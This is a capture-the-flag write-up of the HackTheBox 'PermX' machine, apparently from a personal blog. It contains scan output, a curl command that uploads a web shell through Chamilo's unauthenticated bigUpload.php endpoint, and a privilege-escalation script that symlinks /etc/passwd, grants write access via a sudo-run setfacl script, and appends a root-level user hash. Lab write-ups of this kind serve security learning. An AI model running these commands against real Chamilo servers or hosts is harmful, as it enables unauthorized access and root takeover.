root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF: HACKTHEBOX

LAB: PERMX

RECONNAISSANCE

Rustscan’s output

 ❯ rustscan -a 10.10.11.23 -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢
  
[~] The config file is expected to be at "/home/sensei/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")
  
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:18 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:18, 0.21s elapsed (1 total hosts)
Initiating Connect Scan at 10:18
Scanning permx.htb (10.10.11.23) [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:18, 0.21s elapsed (2 total ports)
Initiating Service scan at 10:18
Scanning 2 services on permx.htb (10.10.11.23)
Completed Service scan at 10:18, 6.81s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.23.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 7.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 3.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Nmap scan report for permx.htb (10.10.11.23)
Host is up, received conn-refused (0.21s latency).
Scanned at 2024-09-03 10:18:10 EDT for 18s
  
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAyYzjPGuVga97Y5vl5BajgMpjiGqUWp23U2DO9Kij5AhK3lyZFq/rroiDu7zYpMTCkFAk0fICBScfnuLHi6NOI=
|   256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8A41tX6hHpQeDLNhKf2QuBM7kqwhIBXGZ4jiOsbYCI
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: eLEARNING
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.72 seconds

Subdomain enumeration with ffuf spots lms,we don’t need to check www it is just the normal permx.htb page

Subdomain lms.permx.htb hosts a learning management portal Chamilo

Chamilo is vulnerable to unauthenticated file upload as explained in this github repo

Exploiting Chamilo with curl

Php page /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported allows us to upload any file type, we can upload a webshell to execute commands

I uploaded the file with curl

❯ curl -F "bigUploadFile=@<shell filename>" "http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
The file has successfully been uploaded.%

Access your web shell at route /main/inc/lib/javascript/bigupload/files/[filename]

Shell access

USER MTZ

I ran linpeas and discovered a password in a db config file. I was able to login to user mtz with the password

User mtz access

PRIVESC with SETFACL

I ran sudo -l and noticed a rule that user mtz can run a sh script /opt/acl.sh as root without passwd

Acl.sh

The script’s usage syntax is acl.sh [user] [perm] [file]

The target file must be in /home/mtz/* file directory and must not contain .. to prevent path traversal.

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
  /usr/bin/echo "Access denied."
  exit 1

Then,this code checks if it is a file

  # Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

Then, it runs setfacl to grant a user specific permissions in respect to a file.
```
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
```

Exploiting the ACL script

We can exploit this by creating symbolic link of /etc/passwd in mtz’s directory.After creating the symbolic link wiith write access to /etc/passwd, we can edit and add a new user hash with root privileges.

We will copy this root hash to password to the passwd symbolic link,you can generate an hash with openssl passwd [password]. This hash’s password is password123.
```
sensei:$1$1YY732V9$Irh.HtaGlscLmIz6SLQgM/:0:0:root:/root:/bin/bash
```
Editing the passwd file

It reflects in /etc/passwd

You can automate it with this

 ln -s /etc/passwd ~/passwd
 sudo -u root /opt/acl.sh mtz rwx /home/mtz/passwd
 echo "sensei:\$1\$1YY732V9\$Irh.HtaGlscLmIz6SLQgM/:0:0:root:/root:/bin/bash" >> /home/mtz/passwd
 /usr/bin/echo "enter 'password123'"
 su sensei

Access to user sensei

Root